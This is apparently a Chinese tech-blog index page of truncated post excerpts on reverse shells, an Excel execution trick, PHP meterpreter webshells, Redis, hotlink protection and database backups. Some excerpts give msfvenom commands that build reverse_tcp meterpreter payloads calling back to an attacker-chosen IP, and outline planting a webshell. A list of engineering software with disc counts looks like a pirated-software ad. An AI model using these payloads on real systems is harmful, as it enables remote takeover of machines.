背景 该漏洞最初由Pieter Ceelen发现。如果安装时启用 ,可实现悄无声息执行命令。 查看打开文件的默认程序,可以看到 文件默认用Excel打开 POC,打开计算器测试 反弹shell测试 总结 默认配置的Excel一般会有宏的提示,对于安全意识不高的群体仍然存在一定的风险。 参考 http ...
分类:
系统相关 时间:
2019-11-18 18:42:22
阅读次数:
112
0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/me ...
分类:
其他好文 时间:
2019-11-16 14:14:37
阅读次数:
138
0x00 反弹shell概述 反弹shell:即reverse shell,在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,通过反弹的shell去远程控制服务器。 0x01 反弹shell原因 通常由于防火墙、权限不足、端口占用等情况下,无法直接连接目标主机,此时 ...
分类:
系统相关 时间:
2019-11-16 12:18:17
阅读次数:
134
1:redis持久化的2种方式 RDB以及AOF RDB每次进行快照方式会重新记录整个数据集的所有信息。RDB在恢复数据时更快,可以最大化redis性能,子进程对父进程无任何性能影响。 AOF有序的记录了redis的命令操作。意外情况下数据丢失甚少。他不断地对aof文件添加操作日志记录. 前者是指超 ...
分类:
其他好文 时间:
2019-11-13 12:37:14
阅读次数:
74
防盗链概述防盗链就是防止别人的网站代码里面盗用服务器的图片文件、视频等相关资源.如果别人盗用网站的这些静态资源,明显的是会增大服务器的带宽压力.所以作为网站的维护人员,要杜绝我们服务器的静态资源被其他网站盗用.配置规则变量说明%{HTTP_REFERER}:浏览header中的链接字段,存放一一个链接的URL,代表是从哪个链接访问所需的网页!^:不以后面的字符串开头.*$:以任意字符结尾NC:不区
分类:
Web程序 时间:
2019-10-29 00:13:23
阅读次数:
137
Keysight SystemVue 2020 ENG Win64 1DVD Siemens.Simcenter.SPEED.14.04.013.Windows 1CD Siemens.Tecnomatix.RealNC.8.7.Windows 1CD AQTESOLV Pro 4.5 1CD Ge ...
分类:
其他好文 时间:
2019-10-25 10:24:21
阅读次数:
444
fread 读入 fread 读入 有莫名其妙的问题,一般不用 1 inline char nc(){ 2 static char buf[100000],*p1=buf,*p2=buf; 3 return p1==p2&&(p2=(p1=buf)+fread(buf,1,100000,stdin) ...
分类:
其他好文 时间:
2019-10-24 21:46:26
阅读次数:
85
NC+ xtrabackup 备份到远程: source:192.168.30.36target 192.168.9.104 1:开启目标库nc 监听 2:源库传备份,亲测不落地 3:解压 4:恢复: 参考资料 官方网站example ...
分类:
数据库 时间:
2019-10-21 09:36:04
阅读次数:
286
一、PHP后门 在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下: 1. 使用msfvenom 创建一个webshell.php 2. 上传到服务器 3.开始监听 4.访问webshell.php的页面 5. 获得反弹Shell pa ...
分类:
Web程序 时间:
2019-10-10 15:36:22
阅读次数:
130
